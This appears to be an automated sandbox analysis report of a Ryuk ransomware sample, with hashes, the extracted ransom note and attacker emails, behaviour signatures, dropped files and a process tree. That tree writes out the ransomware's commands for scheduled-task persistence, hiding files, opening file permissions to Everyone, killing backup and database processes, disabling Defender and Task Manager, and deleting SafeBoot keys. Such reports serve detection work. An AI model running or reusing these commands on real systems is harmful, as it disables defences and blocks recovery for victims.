Overview

overview

10

Static

static

ryuk.exe

windows10-2004-x64

Resubmissions

21-09-2022 20:38

220921-ze6ayshae5 10

21-09-2022 20:33

220921-zbzzrscfcl 10

Analysis

  • max time kernel
    112s
  • max time network
    124s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-09-2022 20:33

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    ryuk.exe

  • Size

    885KB

  • MD5

    35194c73ff38dd6c3bed7c0efcff6826

  • SHA1

    1a1ebd30f4a3498cc09824b6fdfdf1b8d9ae9db1

  • SHA256

    5fce1d810a5e1c7536496c1b73eff77c9c3d92ac41f86959a1be5349663403ae

  • SHA512

    cf2ed61ffdfad8067aff8776e0dab1f27ea2551f7497108a6cca7eb0105a5f96ea1453dde29f488433cc645e55104d7397ee4f35db51526993823ef46763f28f

  • SSDEEP

    12288:CXrZ7kwy8U9JlpYqWYgeWYg955/155/0QebUlAAs7sKSAoSRn6X:C97ktflKgQKUKR7sKSAhN6

Score
10/10
ryukdiscoveryevasionransomware

Malware Config

Extracted

Path

C:\ProgramData\RyukReadMe.txt

Ransom Note
Your network has been penetrated. All files on each host in the network have been encrypted with a strong algorithm. Backups were either encrypted Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover. We exclusively have decryption software for your situation. More than a year ago, world experts recognized the impossibility of deciphering by any means except the original decoder. No decryption software is available in the public. Antiviruse companies, researchers, IT specialists, and no other persons cant help you decrypt the data. DO NOT RESET OR SHUTDOWN - files may be damaged. DO NOT DELETE readme files. To confirm our honest intentions.Send 2 different random files and you will get it decrypted. It can be from different computers on your network to be sure that one key decrypts everything. 2 files we unlock for free To get info (decrypt your files) contact us at Recoverfile@aol.com or Recoverfile1@aol.com You will receive btc address for payment in the reply letter Ryuk No system is safe
Emails

Recoverfile@aol.com

Recoverfile1@aol.com

Signatures

  • Ryuk

    Ransomware distributed via existing botnets, often Trickbot or Emotet.

    ransomwareryuk
  • Disables Task Manager via registry modification
    evasion
  • Drops startup file 3 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Kills process with taskkill 2 IoCs
    evasion
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\ryuk.exe
    "C:\Users\Admin\AppData\Local\Temp\ryuk.exe"
    1⤵
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4824
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3064
      • C:\Windows\system32\schtasks.exe
        schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
        3⤵
        • Creates scheduled task(s)
        PID:3600
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
      2⤵
      • Drops startup file
      PID:5032
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
      2⤵
        PID:1732
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4112
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
          3⤵
          • Creates scheduled task(s)
          PID:4192
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1672
        • C:\Windows\system32\attrib.exe
          attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
          3⤵
          • Drops startup file
          • Views/modifies file attributes
          PID:1128
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\ryuk.exe" /RU SYSTEM /RL HIGHEST /F
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3596
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\ryuk.exe" /RU SYSTEM /RL HIGHEST /F
          3⤵
          • Creates scheduled task(s)
          PID:4528
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\ryuk.exe" /F
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:628
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\ryuk.exe" /F
          3⤵
          • Creates scheduled task(s)
          PID:3568
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1148
        • C:\Windows\system32\attrib.exe
          attrib +h +s ryuk.exe
          3⤵
          • Views/modifies file attributes
          PID:2372
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2768
        • C:\Windows\system32\attrib.exe
          attrib +h +s C:\ProgramData\ryuk.exe
          3⤵
          • Views/modifies file attributes
          PID:2324
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2764
        • C:\Windows\system32\cmd.exe
          cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4352
          • C:\Windows\system32\icacls.exe
            icacls * /grant Everyone:(OI)(CI)F /T /C /Q
            4⤵
            • Modifies file permissions
            PID:388
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4532
        • C:\Windows\system32\reg.exe
          reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
          3⤵
            PID:1472
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:228
          • C:\Windows\system32\cmd.exe
            cmd.exe /c taskkill /t /f /im sql*
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1556
            • C:\Windows\system32\taskkill.exe
              taskkill /t /f /im sql*
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:968
          • C:\Windows\system32\taskkill.exe
            taskkill /f /t /im veeam*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3884
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1
          2⤵
            PID:3080
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2
            2⤵
              PID:1124
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID
              2⤵
                PID:5112
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1
                2⤵
                  PID:4804
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "
                  2⤵
                    PID:5060
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2896
                    • C:\Windows\system32\reg.exe
                      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                      3⤵
                        PID:4564
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                      2⤵
                        PID:2548
                        • C:\Windows\system32\reg.exe
                          reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                          3⤵
                            PID:2464
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
                          2⤵
                            PID:1976
                            • C:\Windows\system32\reg.exe
                              reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
                              3⤵
                                PID:1288
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
                              2⤵
                                PID:3876
                                • C:\Windows\system32\reg.exe
                                  reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
                                  3⤵
                                    PID:1312
                              • C:\Windows\System32\rundll32.exe
                                C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                1⤵
                                  PID:4988
                                • C:\Windows\system32\LogonUI.exe
                                  "LogonUI.exe" /flags:0x4 /state0:0xa39ad055 /state1:0x41c64e6d
                                  1⤵
                                    PID:4124

                                  Network

                                  MITRE ATT&CK Matrix ATT&CK v6

                                  Initial Access

                                  Execution

                                  Scheduled Task

                                  1
                                  T1053

                                  Persistence

                                  Scheduled Task

                                  1
                                  T1053

                                  Hidden Files and Directories

                                  1
                                  T1158

                                  Privilege Escalation

                                  Scheduled Task

                                  1
                                  T1053

                                  Defense Evasion

                                  File Permissions Modification

                                  1
                                  T1222

                                  Hidden Files and Directories

                                  1
                                  T1158

                                  Credential Access

                                  Discovery

                                  Query Registry

                                  1
                                  T1012

                                  Peripheral Device Discovery

                                  1
                                  T1120

                                  System Information Discovery

                                  2
                                  T1082

                                  Lateral Movement

                                  Collection

                                  Exfiltration

                                  Command and Control

                                  Impact

                                  Replay Monitor

                                  Loading Replay Monitor...

                                  Downloads

                                  • C:\ProgramData\RYUKID
                                    Filesize

                                    8B

                                    MD5

                                    20bf1c3daf0bf3cfb0db6661538a9afc

                                    SHA1

                                    5db0319ce78dcae075cc393c374b0856cdc2e02a

                                    SHA256

                                    fb3092f5b65b685c2b3550ddbabcc6313a90cced525fe2d3a3e76b692e5f09c6

                                    SHA512

                                    bfbac6e6618881f2b8bb119da816441d6540d4137bd4df631d1b3874f301aa1c599d5e488e109adae6e2ee26f15ca67e1d98a8e09bc9fedac77c99477e00e98e

                                    Download Submit
                                  • C:\ProgramData\RyukReadMe.txt
                                    Filesize

                                    1KB

                                    MD5

                                    3cfd6ef3b2825aa6ce421e10604ff452

                                    SHA1

                                    7c7c75df4105d3b0d69d1e03220f4d24644a8bde

                                    SHA256

                                    65adfc7e8a2bf62ec815a0aded844c1f0812576d655e523201b02ca5ffe3313d

                                    SHA512

                                    d6c130f880ae02ff9f1d08e4b8c825d42f0ea640bd74faf16841a13438976b5e41b94d6260da1622848c3197ad25f446064fd60264b62d992b87c780dbb693fc

                                    Download Submit
                                  • C:\ProgramData\hrmlog1
                                    Filesize

                                    2KB

                                    MD5

                                    4b6fbbf03e95f33ba5c363bb67de4b9b

                                    SHA1

                                    e45dbd1ba30ef87d57779dc8ef3f58aba87e5960

                                    SHA256

                                    3f449da876b4329929cd0832cf5098b7f9e1c07e5e25ffcbd2bd03b80aa9ead0

                                    SHA512

                                    bc2216b3c363f5466dd290bb0de6167c15b5f23ecfce978dde46b853b6e9ce78a8d029033805bdd6177ea0ef64612e84857d893a0b9fad31f042e05e09ac7e3b

                                    Download Submit
                                  • C:\ProgramData\hrmlog1
                                    Filesize

                                    2KB

                                    MD5

                                    4b6fbbf03e95f33ba5c363bb67de4b9b

                                    SHA1

                                    e45dbd1ba30ef87d57779dc8ef3f58aba87e5960

                                    SHA256

                                    3f449da876b4329929cd0832cf5098b7f9e1c07e5e25ffcbd2bd03b80aa9ead0

                                    SHA512

                                    bc2216b3c363f5466dd290bb0de6167c15b5f23ecfce978dde46b853b6e9ce78a8d029033805bdd6177ea0ef64612e84857d893a0b9fad31f042e05e09ac7e3b

                                    Download Submit
                                  • C:\ProgramData\hrmlog2
                                    Filesize

                                    292B

                                    MD5

                                    9c66e5c92f7a62d7203428c7d1cda350

                                    SHA1

                                    5b8851a561e6c39000d58f6dcc91b858caa98224

                                    SHA256

                                    2d5f5f7ba92a73632855302d47121700e4cd39f2d6784332125ee2ac2acbc2fe

                                    SHA512

                                    9ce06641d71ecad6f5a24b4b402193f26cafe1a21c0ec44e61b2247959c47838299f06636e7ddea9e41eeb3f1f7dcb76489f2dfac51579f509618534b1b10911

                                    Download Submit
                                  • C:\ProgramData\hrmlog2
                                    Filesize

                                    292B

                                    MD5

                                    9c66e5c92f7a62d7203428c7d1cda350

                                    SHA1

                                    5b8851a561e6c39000d58f6dcc91b858caa98224

                                    SHA256

                                    2d5f5f7ba92a73632855302d47121700e4cd39f2d6784332125ee2ac2acbc2fe

                                    SHA512

                                    9ce06641d71ecad6f5a24b4b402193f26cafe1a21c0ec44e61b2247959c47838299f06636e7ddea9e41eeb3f1f7dcb76489f2dfac51579f509618534b1b10911

                                    Download Submit
                                  • C:\ProgramData\ryuk.exe
                                    Filesize

                                    885KB

                                    MD5

                                    35194c73ff38dd6c3bed7c0efcff6826

                                    SHA1

                                    1a1ebd30f4a3498cc09824b6fdfdf1b8d9ae9db1

                                    SHA256

                                    5fce1d810a5e1c7536496c1b73eff77c9c3d92ac41f86959a1be5349663403ae

                                    SHA512

                                    cf2ed61ffdfad8067aff8776e0dab1f27ea2551f7497108a6cca7eb0105a5f96ea1453dde29f488433cc645e55104d7397ee4f35db51526993823ef46763f28f

                                    Download Submit
                                  • C:\Users\Admin\AppData\Local\Temp\RYUKID
                                    Filesize

                                    8B

                                    MD5

                                    20bf1c3daf0bf3cfb0db6661538a9afc

                                    SHA1

                                    5db0319ce78dcae075cc393c374b0856cdc2e02a

                                    SHA256

                                    fb3092f5b65b685c2b3550ddbabcc6313a90cced525fe2d3a3e76b692e5f09c6

                                    SHA512

                                    bfbac6e6618881f2b8bb119da816441d6540d4137bd4df631d1b3874f301aa1c599d5e488e109adae6e2ee26f15ca67e1d98a8e09bc9fedac77c99477e00e98e

                                    Download Submit
                                  • C:\Users\Admin\AppData\Local\Temp\hrmlog1
                                    Filesize

                                    2KB

                                    MD5

                                    4b6fbbf03e95f33ba5c363bb67de4b9b

                                    SHA1

                                    e45dbd1ba30ef87d57779dc8ef3f58aba87e5960

                                    SHA256

                                    3f449da876b4329929cd0832cf5098b7f9e1c07e5e25ffcbd2bd03b80aa9ead0

                                    SHA512

                                    bc2216b3c363f5466dd290bb0de6167c15b5f23ecfce978dde46b853b6e9ce78a8d029033805bdd6177ea0ef64612e84857d893a0b9fad31f042e05e09ac7e3b

                                    Download Submit
                                  • C:\Users\Admin\AppData\Local\Temp\hrmlog2
                                    Filesize

                                    292B

                                    MD5

                                    9c66e5c92f7a62d7203428c7d1cda350

                                    SHA1

                                    5b8851a561e6c39000d58f6dcc91b858caa98224

                                    SHA256

                                    2d5f5f7ba92a73632855302d47121700e4cd39f2d6784332125ee2ac2acbc2fe

                                    SHA512

                                    9ce06641d71ecad6f5a24b4b402193f26cafe1a21c0ec44e61b2247959c47838299f06636e7ddea9e41eeb3f1f7dcb76489f2dfac51579f509618534b1b10911

                                    Download Submit
                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe
                                    Filesize

                                    885KB

                                    MD5

                                    35194c73ff38dd6c3bed7c0efcff6826

                                    SHA1

                                    1a1ebd30f4a3498cc09824b6fdfdf1b8d9ae9db1

                                    SHA256

                                    5fce1d810a5e1c7536496c1b73eff77c9c3d92ac41f86959a1be5349663403ae

                                    SHA512

                                    cf2ed61ffdfad8067aff8776e0dab1f27ea2551f7497108a6cca7eb0105a5f96ea1453dde29f488433cc645e55104d7397ee4f35db51526993823ef46763f28f

                                    Download Submit
                                  • memory/228-154-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/388-161-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/628-144-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/968-165-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/1124-160-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/1128-140-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/1148-146-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/1288-178-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/1312-180-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/1472-153-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/1556-155-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/1672-139-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/1732-136-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/1976-177-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/2324-149-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/2372-147-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/2464-176-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/2548-175-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/2764-150-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/2768-148-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/2896-173-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/3064-132-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/3080-157-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/3568-145-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/3596-142-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/3600-133-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/3876-179-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/3884-156-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/4112-137-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/4192-138-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/4352-152-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/4528-143-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/4532-151-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/4564-174-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/4804-169-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/5032-134-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/5060-171-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/5112-164-0x0000000000000000-mapping.dmp
                                    Download